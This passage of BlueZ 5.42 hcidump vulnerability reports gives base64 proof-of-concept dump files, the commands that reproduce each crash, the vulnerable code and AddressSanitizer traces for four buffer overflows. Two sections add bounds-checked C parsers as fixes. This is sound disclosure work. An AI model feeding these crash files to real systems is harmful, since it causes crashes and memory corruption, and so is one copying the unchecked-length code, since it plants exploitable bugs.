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
j48=

Affected code:
104 static inline int read_n(int fd, char *buf, int len)
105 {
106 	int t = 0, w;
107 
108 	while (len > 0) {
109 		if ((w = read(fd, buf, len)) < 0) {
110 			if (errno == EINTR || errno == EAGAIN)
111 				continue;
112 			return -1;
113 		}
114 		if (!w)
115 			return 0;
116 		len -= w; buf += w; t += w;
117 	}
118 	return t;
119 }

Repeat-By:
echo <above base64> > PoC.b64
base64 -d PoC.b64 > PoC.file
valgrind ./tools/hcidump -a -r PoC.file

ASAN Report (bluez needs to be compiled with -fsanitize=address for this):
==19127==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001f75c at pc 0x7034529f99b6 bp 0x7289d18014f0 sp 0x7289d18014d8
WRITE of size 3712 at 0x61b00001f75c thread T0
    #0 0x7034529f99b5 in read (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x299b5)
    #1 0x403a3b in read_n tools/hcidump.c:109
    #2 0x403a3b in read_dump tools/hcidump.c:397
    #3 0x403a3b in main tools/hcidump.c:810
    #4 0x703452646b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
    #5 0x40529e (/opt/bluez/tools/hcidump+0x40529e)

0x61b00001f75c is located 0 bytes to the right of 1500-byte region [0x61b00001f180,0x61b00001f75c)
allocated by thread T0 here:
    #0 0x703452a2473f in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x5473f)
    #1 0x402f12 in read_dump tools/hcidump.c:288
    #2 0x402f12 in main tools/hcidump.c:810
SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 read
Shadow bytes around the buggy address:
  0x0c367fffbe90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c367fffbea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c367fffbeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c367fffbec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c367fffbed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c367fffbee0: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa
  0x0c367fffbef0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c367fffbf00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c367fffbf10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c367fffbf20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c367fffbf30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Contiguous container OOB:fc
  ASan internal:           fe
==19127==ABORTING
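The read_n report above shows the whole problem in one line: "WRITE of size 3712" into a 1500-byte region. read_n itself is fine; it copies exactly as many bytes as it is told to. The defect is that the caller hands it a length taken from the file without first comparing that length with the buffer it allocated. The example below is an added illustration, not hcidump's own code: it keeps read_n as printed in the report and wraps it in a record reader that rejects an over-long length before read() is allowed to touch the buffer. The record layout (2-byte little-endian length, then payload) and the SNAP_LEN value are assumptions for this example only, and the sample records are constructed here, not taken from the PoC file.

```c
#include <errno.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <unistd.h>

#define SNAP_LEN 1500   /* capture buffer size; matches the 1500-byte region in the report */

/* read_n as printed in the report: loop until 'len' bytes arrive, retrying on
 * EINTR/EAGAIN. It trusts 'len' completely, so the caller must guarantee that
 * 'len' never exceeds what 'buf' can hold. */
static int read_n(int fd, char *buf, int len)
{
    int t = 0, w;

    while (len > 0) {
        if ((w = read(fd, buf, len)) < 0) {
            if (errno == EINTR || errno == EAGAIN)
                continue;
            return -1;
        }
        if (!w)
            return 0;
        len -= w; buf += w; t += w;
    }
    return t;
}

enum rec_status { REC_OK = 0, REC_EOF = 1, REC_TOO_LONG = -2, REC_TRUNCATED = -3, REC_IOERR = -4 };

/* Reads one record in a layout assumed for this example only (NOT hcidump's
 * real file header): a 2-byte little-endian payload length, then the payload.
 * The length comes straight from the file, so it is checked against the
 * buffer size before read_n may write anything. */
static int read_record(int fd, char *buf, size_t buf_size, size_t *out_len)
{
    uint8_t hdr[2];
    size_t len;
    int r;

    r = read_n(fd, (char *)hdr, (int)sizeof hdr);
    if (r == 0)
        return REC_EOF;                 /* clean end of file */
    if (r < 0)
        return REC_IOERR;
    len = hdr[0] | ((size_t)hdr[1] << 8);
    if (len > buf_size)
        return REC_TOO_LONG;            /* the check the report shows missing */
    r = read_n(fd, buf, (int)len);
    if (r < 0)
        return REC_IOERR;
    if ((size_t)r != len)
        return REC_TRUNCATED;           /* file ended inside the payload */
    *out_len = len;
    return REC_OK;
}

/* Demo helper: expose a byte string as a readable fd via a pipe. */
static int fd_from_bytes(const void *data, size_t n)
{
    int p[2];

    if (pipe(p) < 0)
        return -1;
    if (n && write(p[1], data, n) != (ssize_t)n) {
        close(p[0]);
        close(p[1]);
        return -1;
    }
    close(p[1]);                        /* reader sees EOF after the data */
    return p[0];
}

/* Reads the first record of a constructed stream into a SNAP_LEN buffer. */
static int check_stream(const void *data, size_t n, size_t *out_len)
{
    char buf[SNAP_LEN];
    int fd = fd_from_bytes(data, n);
    int rc;

    if (fd < 0)
        return REC_IOERR;
    rc = read_record(fd, buf, sizeof buf, out_len);
    close(fd);
    return rc;
}

static int status_of(const void *data, size_t n)
{
    size_t unused = 0;
    return check_stream(data, n, &unused);
}

/* Constructed sample records (string sizes exclude the terminating NUL). */
static const char rec_good[]   = "\x03\x00" "abc";   /* length 3, payload "abc" */
static const char rec_oversz[] = "\x80\x0e";         /* length 3712 = 0x0e80, as in the report */
static const char rec_short[]  = "\x05\x00" "ab";    /* claims 5 bytes, only 2 present */

/* Returns 1 if every sample is classified as expected. */
static int run_samples(void)
{
    size_t n = 0;

    return check_stream(rec_good, sizeof rec_good - 1, &n) == REC_OK && n == 3
        && status_of(rec_oversz, sizeof rec_oversz - 1) == REC_TOO_LONG
        && status_of(rec_short, sizeof rec_short - 1) == REC_TRUNCATED
        && status_of(rec_good, 0) == REC_EOF;
}

int main(void)
{
    printf("good: %d  oversized: %d  truncated: %d  empty: %d\n",
           status_of(rec_good, sizeof rec_good - 1),
           status_of(rec_oversz, sizeof rec_oversz - 1),
           status_of(rec_short, sizeof rec_short - 1),
           status_of(rec_good, 0));
    return run_samples() ? 0 : 1;
}
```

The oversized record is rejected after only its header has been consumed; the payload is never read, so no write of 3712 bytes into a 1500-byte buffer can happen regardless of what follows in the file.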
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
Machine Type: x86_64-unknown-linux-gnu
BlueZ Version: 5.42
Release Status: release
Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz

Description:
An out-of-bound read was observed in the "sdp_dump" function in the "tools/parser/sdp.c" source file. This issue can be triggered by processing a corrupted dump file and will result in an hcidump crash. To replicate this issue, use the attached sample below and execute the following command:

./tools/hcidump -a -r <PoC File>

PoC.file base64 encoded:
IAAABP8EDP///3//AgICFwIXAAEAAj4AAAEAAAC1tY8ABADrGgD/jikAmM0gAPf/GRAAkI0VAJ8C
AgITAhcAAAAFPgAAAQz///9//wICAhcCFwABAAI+AAAAtbX/GRAAkI0VAJ8CAgAAAPgCAgICQAAA

Affected code:
749 	case SDP_SERVICE_ATTR_RSP:
750 		/* Parse AttributeByteCount */
751 		count = p_get_u16(frm);
752 		p_indent(level + 1, frm);
753 		printf("count %d\n", count);
754 
755 		/* Parse ContinuationState */
756 		cont = *(unsigned char *)(frm->ptr + count);
757 
758 		if (cont == 0) {
759 			/* Parse AttributeList */
760 			print_attr_list(level + 1, frame_get(frm, count));
761 		} else
762 			frame_add(frm, count);
763 
764 		print_cont_state(level + 1, frm->ptr + count);
765 		break;
766 

Repeat-By:
echo <above base64> > PoC.b64
base64 -d PoC.b64 > PoC.file
valgrind ./tools/hcidump -a -r PoC.file

ASAN Report (bluez needs to be compiled with -fsanitize=address for this):
==17871==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001fe8f at pc 0x4e30b5 bp 0x7ce9e036fa90 sp 0x7ce9e036fa88
READ of size 1 at 0x61b00001fe8f thread T0
    #0 0x4e30b4 in sdp_dump tools/parser/sdp.c:756
    #1 0x49a9c2 in l2cap_parse tools/parser/l2cap.c:1464
    #2 0x479c9c in acl_dump tools/parser/hci.c:4041
    #3 0x479c9c in hci_dump tools/parser/hci.c:4120
    #4 0x4035d4 in parse tools/parser/parser.h:260
    #5 0x4035d4 in read_dump tools/hcidump.c:425
    #6 0x4035d4 in main tools/hcidump.c:810
    #7 0x6c387c278b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
    #8 0x40529e (/opt/bluez/tools/hcidump+0x40529e)

AddressSanitizer can not describe address in more detail (wild memory access suspected).
SUMMARY: AddressSanitizer: heap-buffer-overflow tools/parser/sdp.c:756 sdp_dump
Shadow bytes around the buggy address:
  0x0c367fffbf80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c367fffbf90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c367fffbfa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c367fffbfb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c367fffbfc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c367fffbfd0: fa[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c367fffbfe0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c367fffbff0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c367fffc000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c367fffc010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c367fffc020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Contiguous container OOB:fc
  ASan internal:           fe
==17871==ABORTING
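The sdp_dump and print_cont_state reports are two halves of the same defect. sdp_dump takes AttributeByteCount from the packet and dereferences frm->ptr + count without comparing count with frm->len (the "wild memory access" ASan flags), and print_cont_state then takes the continuation-state size byte and loops over that many bytes with no length at all. Both are fixed by carrying the remaining length next to the pointer and checking every packet-supplied count against it before the pointer moves. The following is an added example of that pattern, not hcidump's code; the sdp_frame type is a stand-in for the project's frame struct, AttributeByteCount is decoded big-endian because SDP fields are sent in network byte order, and the four sample bodies are constructed here rather than taken from the PoC files.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Minimal frame view for this example: a cursor into the packet plus the
 * bytes remaining after it. hcidump's own frame type is not used here. */
struct sdp_frame {
    const uint8_t *ptr;
    size_t len;
};

/* ContinuationState is one size byte followed by that many bytes of state.
 * Returns the total field length, or -1 if 'avail' cannot hold all of it.
 * This is the check the loop in print_cont_state lacks. */
static int cont_state_len(const uint8_t *buf, size_t avail)
{
    if (avail < 1)
        return -1;
    if ((size_t)buf[0] + 1 > avail)
        return -1;
    return buf[0] + 1;
}

/* SDP_SERVICE_ATTR_RSP body: u16 AttributeByteCount (big-endian), 'count'
 * bytes of attribute list, then ContinuationState. Returns bytes consumed,
 * or -1 if either length field points past the end of the frame. The
 * unchecked version read the byte at ptr + count before comparing count
 * with the remaining length. */
static int parse_attr_rsp(const struct sdp_frame *frm)
{
    size_t count;
    int cont;

    if (frm->len < 2)
        return -1;
    count = ((size_t)frm->ptr[0] << 8) | frm->ptr[1];
    if (count > frm->len - 2)
        return -1;                      /* AttributeByteCount overruns the frame */
    cont = cont_state_len(frm->ptr + 2 + count, frm->len - 2 - count);
    if (cont < 0)
        return -1;                      /* ContinuationState overruns the frame */
    return (int)(2 + count + (size_t)cont);
}

/* Convenience wrapper over a raw byte buffer. */
static int parse_attr_rsp_bytes(const uint8_t *buf, size_t len)
{
    struct sdp_frame frm = { buf, len };
    return parse_attr_rsp(&frm);
}

/* Constructed sample bodies (not taken from the PoC files above). */
static const uint8_t rsp_ok[]        = { 0x00, 0x03, 0x35, 0x01, 0x09, 0x00 }; /* count 3, empty continuation */
static const uint8_t rsp_ok_cont[]   = { 0x00, 0x01, 0x35, 0x02, 0xAA, 0xBB }; /* count 1, 2-byte continuation */
static const uint8_t rsp_bad_count[] = { 0xFF, 0xFF, 0x00 };                   /* count 65535 in a 3-byte body */
static const uint8_t rsp_bad_cont[]  = { 0x00, 0x00, 0x05, 0x01 };             /* cont claims 5 bytes, 1 present */

/* Returns 1 only if every sample gets the expected verdict. */
static int run_samples(void)
{
    return parse_attr_rsp_bytes(rsp_ok, sizeof rsp_ok) == 6
        && parse_attr_rsp_bytes(rsp_ok_cont, sizeof rsp_ok_cont) == 6
        && parse_attr_rsp_bytes(rsp_bad_count, sizeof rsp_bad_count) == -1
        && parse_attr_rsp_bytes(rsp_bad_cont, sizeof rsp_bad_cont) == -1;
}

int main(void)
{
    printf("ok body:        %d\n", parse_attr_rsp_bytes(rsp_ok, sizeof rsp_ok));
    printf("ok with cont:   %d\n", parse_attr_rsp_bytes(rsp_ok_cont, sizeof rsp_ok_cont));
    printf("bad count:      %d\n", parse_attr_rsp_bytes(rsp_bad_count, sizeof rsp_bad_count));
    printf("bad cont state: %d\n", parse_attr_rsp_bytes(rsp_bad_cont, sizeof rsp_bad_cont));
    return run_samples() ? 0 : 1;
}
```

rsp_bad_count has the shape of the sdp_dump crash (a count larger than the frame) and rsp_bad_cont the shape of the print_cont_state crash (a continuation size larger than what remains); both are refused without any byte outside the buffer being touched.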
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
Machine Type: x86_64-unknown-linux-gnu
BlueZ Version: 5.42
Release Status: release
Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz

Description:
A buffer overflow was observed in the "set_ext_ctrl" function in the "tools/parser/l2cap.c" source file. This issue can be triggered by processing a corrupted dump file and will result in an hcidump crash. To replicate this issue, use the attached sample below and execute the following command:

./tools/hcidump -a -r <PoC File>

PoC.file base64 encoded:
IAAKABAAAKKAABU0AgAAA+gXAAEABf9WAAAAIAICNwcABwICNwcCAjcHACCAKhU0AgIAAAMXAAEA
Bf//////IK+vr6+vr6+vr6+vr6+vr6+vr6+np6enp6enp6enp6enp6enp6enp6enp6enp6enp29v
b29vb29vb29vb29vb29vb29vb4AAAQAWPk0+WBr/gAD2BAEAEj4+AQAAALoAAwQBABA+Pj5YAAEf
AA7mAQA+CAQSPj4+WBo1utgDBAEAEj4+PUI6Pro=

Affected code:
225 static void set_ext_ctrl(int in, uint16_t handle, uint16_t cid,
226 							uint8_t ext_ctrl)
227 {
228 	register cid_info *table = cid_table[in];
229 	register int i;
230 
231 	for (i = 0; i < CID_TABLE_SIZE; i++)
232 		if (table[i].handle == handle && table[i].cid == cid)
233 			table[i].ext_ctrl = ext_ctrl;
234 }
235 

Repeat-By:
echo <above base64> > PoC.b64
base64 -d PoC.b64 > PoC.file
valgrind ./tools/hcidump -a -r PoC.file

ASAN Report (bluez needs to be compiled with -fsanitize=address for this):
==29005==ERROR: AddressSanitizer: global-buffer-overflow on address 0x000000830251 at pc 0x48d708 bp 0x7b4d8ac14f70 sp 0x7b4d8ac14f68
WRITE of size 1 at 0x000000830251 thread T0
    #0 0x48d707 in set_ext_ctrl tools/parser/l2cap.c:233
    #1 0x48d707 in conf_opt tools/parser/l2cap.c:691
    #2 0x498a05 in conf_rsp tools/parser/l2cap.c:781
    #3 0x498a05 in l2cap_parse tools/parser/l2cap.c:1256
    #4 0x479c9c in acl_dump tools/parser/hci.c:4041
    #5 0x479c9c in hci_dump tools/parser/hci.c:4120
    #6 0x4035d4 in parse tools/parser/parser.h:260
    #7 0x4035d4 in read_dump tools/hcidump.c:425
    #8 0x4035d4 in main tools/hcidump.c:810
    #9 0x6d210d1b7b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
    #10 0x40529e (/opt/bluez/tools/hcidump+0x40529e)

0x000000830251 is located 1 bytes to the right of global variable 'frame_table' from 'tools/parser/sdp.c' (0x82ff80) of size 720
SUMMARY: AddressSanitizer: global-buffer-overflow tools/parser/l2cap.c:233 set_ext_ctrl
Shadow bytes around the buggy address:
  0x0000800fdff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0000800fe000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0000800fe010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0000800fe020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0000800fe030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0000800fe040: 00 00 00 00 00 00 00 00 00 00[f9]f9 f9 f9 f9 f9
  0x0000800fe050: 00 00 00 00 00 00 00 00 00 00 04 f9 f9 f9 f9 f9
  0x0000800fe060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0000800fe070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0000800fe080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0000800fe090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Contiguous container OOB:fc
  ASan internal:           fe
==29005==ABORTING
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
Machine Type: x86_64-unknown-linux-gnu
BlueZ Version: 5.42
Release Status: release
Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz

Description:
A buffer overflow was observed in the "set_mode" function in the "tools/parser/l2cap.c" source file. This issue can be triggered by processing a corrupted dump file and will result in an hcidump crash. To replicate this issue, use the attached sample below and execute the following command:

./tools/hcidump -a -r <PoC File>

PoC.file base64 encoded:
LQAABP8EDEgAtSy2BA7/AAEQEJABgDIAAAAD6LcaAAEGhwH//39vlgAAAQABAAA9PggAav8HAD4+
IABF2RlAAKKA0xU0AgAAAAEXAAEABf9WAAAAIBkCAAEQAAAANPVq/wcAPj4gACneGUAAooDTFTQC
AAAAARcAAQAF/1YAAAAgGQIAARAAAAA09fECFw4CAAEAAH8VAADeAAAAAEABANM9PggAgP8HAD4+
IAAp+BlAAKKA0xU0AgAA8wEyAAEABf9WAAAAIBkCAAEQAAAANPXxAhcOAgABAAB/FQAAAAAAAABA
AQDTPT4IAID/BwA+PiAAKfgZQACigNMVNAIAGgDTPT4IAID/BwA+PiAAKfgAAW+WAAABAAEAAD0+
CABq/wcAPj4gACnZGUAAooDTFTQCAAAAARcAAQAF/1YAAADeGUAAooDTFTQCAAA=

Affected code:
204 static void set_mode(int in, uint16_t handle, uint16_t cid, uint8_t mode)
205 {
206 	register cid_info *table = cid_table[in];
207 	register int i;
208 
209 	for (i = 0; i < CID_TABLE_SIZE; i++)
210 		if (table[i].handle == handle && table[i].cid == cid)
211 			table[i].mode = mode;
212 }
213 

Repeat-By:
echo <above base64> > PoC.b64
base64 -d PoC.b64 > PoC.file
valgrind ./tools/hcidump -a -r PoC.file

ASAN Report (bluez needs to be compiled with -fsanitize=address for this):
==29456==ERROR: AddressSanitizer: global-buffer-overflow on address 0x000000833090 at pc 0x48d41c bp 0x7b8662e79fa0 sp 0x7b8662e79f98
WRITE of size 1 at 0x000000833090 thread T0
    #0 0x48d41b in set_mode tools/parser/l2cap.c:211
    #1 0x48d41b in conf_opt tools/parser/l2cap.c:657
    #2 0x498a05 in conf_rsp tools/parser/l2cap.c:781
    #3 0x498a05 in l2cap_parse tools/parser/l2cap.c:1256
    #4 0x479c9c in acl_dump tools/parser/hci.c:4041
    #5 0x479c9c in hci_dump tools/parser/hci.c:4120
    #6 0x4035d4 in parse tools/parser/parser.h:260
    #7 0x4035d4 in read_dump tools/hcidump.c:425
    #8 0x4035d4 in main tools/hcidump.c:810
    #9 0x7af38a9c4b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
    #10 0x40529e (/opt/bluez/tools/hcidump+0x40529e)

0x000000833090 is located 0 bytes to the right of global variable 'table' from 'tools/parser/cmtp.c' (0x830340) of size 11600
SUMMARY: AddressSanitizer: global-buffer-overflow tools/parser/l2cap.c:211 set_mode
Shadow bytes around the buggy address:
  0x0000800fe5c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0000800fe5d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0000800fe5e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0000800fe5f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
